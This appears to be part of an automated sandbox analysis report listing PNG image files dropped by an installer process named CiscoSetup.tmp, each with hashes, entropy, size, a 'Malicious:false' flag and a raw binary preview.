                                                                                                                                                                                                  SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                                                                                  SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                                                                                  SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx............`....L)VT.U..Id.`*....jt.$.M...`m.........+.T4..8.....d3...^..R1.Q.K.5+. [.....sN..}.q.._...........$+.D..Rm.O..`./..=..?"........n..(.T.6.I.......sg|......K............x...p'.V.....6.........w..d..v...S.Yiu ..xf..*..!7."t.0........F.;u...3.y...........\...Yy..g...w...........=..J{.7..G.<..>..I."........Lwv..s..V..[.;.v0v...].....o............'..e....9=....?(........g~~O.@*..........|<.A..t..o.....f......K.z.'...}F*p.... ..9x.......U...e..m..;...R.@x..^...Mas.Y.=.?\..{.us.. .Z.o:..L..q.Q.>.?.........1ET..5.|....`.P...AF6_.R|.=.{......B......w..s..k.%3.....3R....3H....&._1.L8.,ydq;y.c....6..7B..+.8..l.'=HR...Y.!j..<...=.>.<.x .w..M..._,.x0....q.,.LB. ....6.yxh....\B._..\..E..k..}..o}....[.6/...0z1.......v.D.s3..L.LV..%.MJ$;P.v.\.=..L...J..$......./....H.....x^.m...l/-.....<.-,..e..cD...;>g....0..Z...n..@.0BZ.3..x......,.9..?}.....d.....H...#_.....S2QZ.._
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26674
                                                                                                                                                                                                  Entropy (8bit):7.935979285003627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                                                                                  MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                                                                                  SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                                                                                  SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                                                                                  SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Oh%G...G........4..TSG.nO....j..CI.s.7%...fa..ofQ*...x;...<^/,y1.a.R...RA/.f!..)...R....\K..]......'Od..........d.tN.<...../.O.9>.............}.P8e.M.:8.'#........z.Z;.)K.,--%..'.?a..GB...[1r..I\2...4?..SKN|`. ..E..n..hz..mll.z".KhG\>.i.2....;.....|\.ywww.......a..{2*..Io~.UO..t*...'ckk....~.....zB*......I.R.T9!.OF...|...e(z#.N....o.P.+eOH...]..~..@..!...=*....'>...+O\.u..Z.yo...{.......2ieX9..(.Br):.k!..I.c.}S.'cccc..F.......0q"l...k....ve.>...p.coRw2r.D.[...}....h>.Q.*B<.......y...{&B.<...{...9.e7`.......w...*\.Mt..EU...h.].....r.G..;y..`.d..C6.Y.z#.f.r2.y.5.W.<.#!..!..[.5.yp;...OFL.Brv.V.uoe..O....aV.2.p2....d.t.C..'..e...Q7-.g...._...3.N<....}D:.`3.....n.^.0..X.VF..f.'.u...W...p}.(Y.#......M?.......r4.|...*...@).GGz/`...U....3............F.C...[.5...;..kv.[...+k3$......N...c......j.B(..Z...k....&...8.._..E..M..(I..u..Td.....R....C.......b....E/X;....#..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12558
                                                                                                                                                                                                  Entropy (8bit):7.968059020803266
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                                                                                  MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                                                                                  SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                                                                                  SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                                                                                  SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U...hr!#.D'..i.L.$.l..V...q+.....H..l,.h...T.v.Ui..@..,.....Y.*.1.i........BX%:..4.n.O../..y....s.s....{.}.....>.}.a|R(.!.!e....|.:..Y.Jm..g...E.....S#>...R....0..[Dt.....R...i1,Z9BDJ5B...b49e....b..Z.`..(B.lq..Bq...!b.#Zc!..,Z..P..,....R:S.#.MDe{.Jm..|.L9,Z).B...E....Y......xX..E+%..|..M."eD$u...z.y...}..H.' ..Z.....X...P...Buk..P."d.9x ......uq..;t..q....Q.y...=..'rv......h.F.B5...h.%....K...>...@........7i.....8t8..e.3..-.(K....*DF..+F..>.4nTZ.&G \.......[.G.......|3`.J.a.#....* J..&..e|....x...g}..L...VA...O.....Q.\.U..{.He-...Dkk.NK..w..N~.z.'./N.c.E+&D..B.....~...4nt.#)U.}ml.fEc.|....Z.....,Z.S(...)`.Z*.U}...5}....cGa[_....z...8u......bu_....*~.6ni.Ak..D`..ul.G...F._.("..b.ToZ.D.7g:.U.....L..x=....-.....0...fN.J...j...=.. ^..B..,^.a.RD..+....*...*..........}.xi.E+$a=+...n.*...G...uG..rB.z.a........A+...`6.Re.D\..B..'D....0(,Z>.=.+E..o.....l..Z......T..*6..B..hyPf.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16443
                                                                                                                                                                                                  Entropy (8bit):7.760065707691873
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                                                                                  MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                                                                                  SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                                                                                  SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                                                                                  SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......m......O......tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx...r.H.(l...70.l....L..60}....VrRI.I$_..+.&.:..`kBk......^........H..G.|.*.l}.@......,.........................................................................................................................................................................................................................(.....?...i..........B..]......5._O.L/.2}R:.....}.....i.._...R.+..ez...../......?)...)...[....?..S.......x..g.x7.z...T....H...D.... .....H................ ................ .....H.....=...v./...I..4.......S..:..|..1..._.+.s.......hF....y.....!.....:..<._...).....&.P...e..;l.c... ..W.8.... .*.....1@.l.h...'V...k..IL.L.r..h......q...g];/.T.K..rw=...%?>....kM... .0....IB.yr.....;............... .....H.......... ........n._.......-....,....3..,..Q..L.J.2.._..,..2}R2....@..*....?>..*.~.X/....4...k...L/.2.+...4...._...).....(.)......y..@.@.. ......... ..b..WB....@5..W.Ym...?..)...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11747
                                                                                                                                                                                                  Entropy (8bit):7.9792800328394184
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                                                                                  MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                                                                                  SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                                                                                  SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                                                                                  SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...x......._...*.<Ih.^.....s.......D....[.....H..*..z).J..j}&...P.B..l..NBD| ' ..r.&3..={...9....Kr^3s.^..^{= ..............M...v.{.l._...e~...H>.4}...w.gpq...>...$..C8k3\.....>.9.. x...g......R..u...~.y..i..F....<.i......b..r.4..j.d..Id..7\Q4Z....H..=.5.....7..A.*X_.~-V.n.8..J.X/...jK..ZX.\.00N.(=p...zA...L}.~......fN.{.L2...e........x.s..t.......-.5..{M.i..#3g........; q..!#{....... }....t....1..N.....1.r.....h..or.".q.8...t..'..&yL..9..M.d....k....c.j.DO...]x5V.6#4SX:..R#n..f...S....sg.7..~5q.`....y.....9...d.o.xL".`..r"..&.3F...B!..B.......).U./...?..... .....7mAZQ.j..z..p$.o.v.=.@\.$.Vh...b.........\.y....:.d.5.9.R>.9.y..q"....4@.*.{.Qi.J.[...........W.6G..4BO..E8j..a.t. ...............o..%...w.+Rqb..PFGkt..)..z.c.B..+;+.7L......V......0.....*:.[.@.E. ...W ....Go8..U.<&..G!8A.@.hY...4Ifj...Z8..+.U.'..F.ea..-Y.Q.,.w.......dA$".>F.Z.VP[.h].B.R..NU...:P....z...<....G.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83111
                                                                                                                                                                                                  Entropy (8bit):7.138058183615623
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                                                                                  MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                                                                                  SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                                                                                  SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                                                                                  SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......+........%....pHYs...#...#.x.?v.. .IDATx...kn...`..^..#?N...$..d)..c.5d/..ASy.q$Y....y...3.D........................................................................................E.....GW.....P..Z.nC........0\./_Ow?v:...`..x.j=..9.......@....5q....P5.&...hl.....&...hl.....&...hl.....&...hl...M..\v.......P.{.g.h}.;2.@...e#........Xr8.n.....s.er..<.4...fNi......H3.r:.....?u$`'.~.~...dsHN.<.s}.0.qy...x.A<..}7L.y....}^~...].w([U.M`.5..1... .pB.F.>IMc..|..y.].......7...^46.a.....p.c..-...{.`.....,..#x...>I.:......a.........|M.-..k..7:...;...C.........?>~>..)........o9(O.i.'.{.n..~.q....2Q.....W&.....R....Il.....;..~kH|_.R......O....2..}jp....f.1!%..OY....n...F.lfL....W....'.CH,.....g/..y>>~.+*j...$e........Mb..;.........Z...A.:.~...Y|.o1P.A.$...)....~....S;.RR..@...W.&.}.q=.N...:[.C1.5.=...r.U&+._.z.O~o........m......}..t.vcR....u..{...&P..7.......c<....15.?u..5..U.c..........:.*.N.MhPw.=..K..y..>vc.....{;....F>..k......,.-..N...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                  Entropy (8bit):6.344520469543007
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                                                                                  MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                                                                                  SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                                                                                  SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                                                                                  SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............}\.....gAMA......a.....pHYs...........~.....tIME........w.e....tEXtComment.Created with GIMPW.......tEXtSoftware.Paint.NET v3.5.100.r....gIDATHKc`...!@........0.a|Rh..r....0E0>)4.}=..t.....0W....x}......a.`|R...dTw..........B.u..-.z...8.C..^...Y.......IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26026
                                                                                                                                                                                                  Entropy (8bit):7.927985837095832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                                                                                  MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                                                                                  SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                                                                                  SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                                                                                  SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._l.G....ZF.0..4...R...z.G..i/z.6.,...eE.!..s.(...0.E...{0.~.........$.2f...^J.....7.-.1nR'....\K...0.2..Ak.._*....Y..""#"...&U&..."...._*...-.....e..n..7.....m.Di.O...o`{[......y..6.>1..P.....D.'..z]..Q.2.u..^lll.. /...E..h..2..j.j..j|.c.......X&.h.".N..k%...c...L.........e.....j6...[....D....9^"....K..}}}.Dt2..g<..'B.I.....[q....d.:..OB.4'%..I{7.y"..~... q.?iLw..q.[..+...y".8.q.Z%}}}.D....{<.3'"...i6.|.I|..NF.eo....D.t;!..G.....s.DP.c.+=v.'......'B....x.+..A....M...3..O..-@...;.J...U!.t.D.itexw"..G?....gE.;.^...4.C...E.I6.I..U!.gLCC....kT.....'E...;j.V..E..f$........+.*."$.n.n"..!.S..."...$y..F.....+.afff...}rHZ`3$.d.Xs4%.'c..g@0;;K.D..w......pee....7...z.2FGGc.''.T.>l....^g>...............R...ty/...o.....,...~.m9p....r.3.~...1......$1....Y...X.-:.HJ..v...N.C........pR...YL...............6.t......)O...sQ.._.g..y..I.....z.w..X..b{..t.2.\/n.n.d'..k...6...F.|.|...].-.N..N..q..".......l..%
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29327
                                                                                                                                                                                                  Entropy (8bit):7.967732566337996
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                                                                                  MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                                                                                  SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                                                                                  SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                                                                                  SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..]le...V...>H.mE .1.[.0#Q.6.%=..l.....ln.sC.8H#.........F..W5.-."vq1..`.:.b4..$H'-.]3.n.d.i..A.].....G..6.^{}..{=?ic...^{.w....?.cV..;B.........4[..n....r....boo..9c.9..<.(g...].{..]O....OY.b.cqq./x..9u.Uk'...R:...'.....=.G'''...t.....>..4...'...h...."...K..../7z.MOF....'....#...>.|...S.j...3g&...~..1.:.:WB.uWJ..R.dT...'!K..rF.&E...^.......Z.........A...E..........`N...s.b. Wx..)[....o'B....}.E+c6..!.._.+Z.......R.B..G..8..D....._..N.....lle........./'#....W..]...........`0......?.^....t.......g?....j..*..C......KE]..z...P..W.k....PWF..aUT=O*.+.7.]...QA..uz.c.D.IOF..w..hx.E.{pp...1Y..-`{ELN..}....7.0...._..Q.6z....MN...Y../..+...'B.W.s.:?....[.NDBr2._..;;..U(..!......I.7.....k..W_.R..j...'...A.......e.o.\.tkm._...S,....'.....].>....dL.z.\.ml...15u.....6^.6w.:.:.U..e.....A;.)...f,,,.z....{Oi9"....$.V.p....h...L.7.u.d.%...1..o..x..J...N5..;...Z...y.I..hj..&."q.O..2..-1.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8950
                                                                                                                                                                                                  Entropy (8bit):7.969730039207073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                                                                                  MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                                                                                  SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                                                                                  SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                                                                                  SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx....]E......m..Z.o....AZ.n(>V.")1.-F.....m...l...b\.@....E..|....*..'%.RA)...+.e.}.%..T6....3sf.s.s....{.;.7..7..)..i..i...~...?L.v....o.h..|..@<..vR.....ILO ...N..<'a.N......N..bs..!..<,c...}b..U]...../.L...=Enx......V.3.}r.)o.u..|...+g.Hu.*.....k..[.$&z...G#o....o.W.`w.T.5..~=..........V..;..$`.......=zf..Di_....D...r......W].}":..w|...=.._.s.2`r.8!.l.|o.......;hzy..n.s.0..+?3l>....Q5=..:6....L.<.l..x.......{.O.mx..R..i..$...\....#..^7Q.>C..........$..`.=...*...~....oc.e?._q......c}.......G.'.=....<..!X5.....=.8........N@..1c.Q.....5.A.]...)....t7B.......=.V...vn...cGNbr...s.1w...g[....e.6U..{..\...N"......0:....WirR.IL.d...JQ..9.....^/.......Gb/>...z...M-..2......(1. ..$.g..Y..'N... .-)...2...S.M.%......$;.X..R..C..m.m'.|wK...4[..`.....!..o.....,..u..4...._}.....l.O...3.mn..Y..m..M..Q.9..Y...N...!K.?.D..........!....x{d..=...T4.i.M.;.NGf...^.s.....T_&.%...7..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388
                                                                                                                                                                                                  Entropy (8bit):7.139959170245274
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                                                                                  MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                                                                                  SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                                                                                  SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                                                                                  SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~....6IDATH...M.0.E.L....&hG..t...f.........F`.l..}n.....B..).....}.p.k....x..3n|oI.^..G._~%..3...7~.^...#D..]/.lD.....{...#..:...k..+n.U.....)".]'g...9Y...G.w^v.&.FX{....".i.k.:..bN.......b.(H......8.y. .E...s$.V.....U.sOwFo.#...a;:....2.....=.....P...ct.k.A..-....Q...<..R...$.FX.-M......k.W...b.}2o.....p.........IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3880
                                                                                                                                                                                                  Entropy (8bit):6.742220289284142
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                                                                                  MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                                                                                  SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                                                                                  SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                                                                                  SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):478
                                                                                                                                                                                                  Entropy (8bit):7.3703130572324955
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                                                                                  MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                                                                                  SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                                                                                  SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                                                                                  SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH..U.m.@.}E. #d.n.. ..a....2@.6.p. a..AG...}..A.U..% ..g.g........u..%.w....'(.............%..{...S..p.gc.|...Y......|`I.\aZ..5..d@..>'.z.7.)....b...P.'...y..4.l...+........I!{......*w.eFV...d...H....xZT.c.F.=..*.f/.Q...".......BF7.a......)....|`..m.o..=.f.........%.d.._.........z!..&,6.;KwN@Z.<~1..%...b....L....<...k8.c.'.....+.&.dE...o..7.....ke..M..Ot..N..^..n.~............IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11585
                                                                                                                                                                                                  Entropy (8bit):7.961332304899258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                                                                                  MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                                                                                  SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                                                                                  SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                                                                                  SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
